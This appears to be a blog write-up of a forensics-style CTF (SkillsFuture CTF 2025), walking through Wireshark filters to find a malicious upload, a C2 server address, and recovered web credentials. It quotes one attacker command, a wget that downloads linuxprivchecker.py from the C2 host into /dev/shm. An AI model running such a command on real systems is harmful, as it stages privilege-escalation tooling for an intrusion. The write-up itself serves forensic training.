👮‍♂️SFF CTF 25

SkillsFuture CTF 2025 - Forensics-style kind of CTF Challenges

On 19th July I participated in the SkillsFuture (SFF) CTF open category and got 3rd place after solving all the challenges in 19 minutes and 43 seconds.

The background context behind the CTF is that you are doing some forensics work for a police station, and a file upload server has been compromised. The challenges are done sequentially, so you have to do the current challenge to move on to the next.

We are first given a pcap file containing the network traffic between the file upload server and the public.

Suspicious file name

We are told that we need to look for a suspicious file upload, and to submit the name of the file as the answer for the first challenge. Open the pcap using wireshark and filter to search specifically for http file uploads:

Going to the second last entry and looking under HTTP File Data, we can see that the malicious file uploaded was hell0fr13nd.py :

C2 Server IP address and Port

For the second question we are told that the malicious file causes the server to establish a connection with a C2 server, and we are asked for the IP address and port of the C2 server. We can find this information from the same packet. The IP address is 3.237.200.21 and port is 1234.

Command used to download file from C2 server

For the third question we are asked for the command run on the file upload server to retrieve a file from the C2 server. For this we need to change the filter to look for http requests and responses with the C2 server. We can use http && ip.addr == 3.237.200.21 as our filter.

We can see that we are retrieving linuxprivchecker.py via a GET request to the C2 server, but we still do not know the command used to retrieve it. Now we can apply the ip.addr == 3.237.200.21 && tcp.port == 1234 filter to find the command used:

So the command used was wget http://3.237.200.21:8000/linuxprivchecker.py -O /dev/shm/linuxprivchecker.py.

Part 2 - Web server credentials

For the next part, we need to find the credentials used to access a web server at http://3.86.60.136/

In order to do this, we are given a bunch of pcaps and we are told that one of them contains the network traffic from when an admin logged in to the server. To do this quickly we can just cd into the folder containing all the pcaps, and run strings * | grep username.

Secret message

For the last part, we are asked for the secret message displayed by the webserver. We login and see the message U3VwZXIgQ29uZmlkZW50aWFs. But this is not the answer, so we base64 decode it and obtain the actual message: Super Confidential

That concludes the CTF! It was quite easy to solve (especially so with ChatGPT) but I was slowed down by my unfamiliarity with Wireshark. :)

Last updated